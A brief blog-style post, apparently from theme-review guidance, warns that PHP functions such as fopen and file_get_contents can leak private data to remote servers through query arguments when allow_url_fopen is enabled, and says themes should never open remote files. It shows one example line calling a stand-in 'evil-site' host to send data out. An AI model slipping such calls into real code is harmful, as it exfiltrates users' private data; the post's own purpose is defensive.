Dec 10
The PHP functions fopen, file_get_contents, file, and readfile can be used to read files on remote servers when allow_url_fopen is turned on. Although the functions can’t be used to data to the server directly, they can be used to pass query arguments that may contain private data. As an example:
fopen('http://www.evil-site.com/?p=‘);
It’s possible that a plugin might need to open remote files, but themes never should.
Recent Comments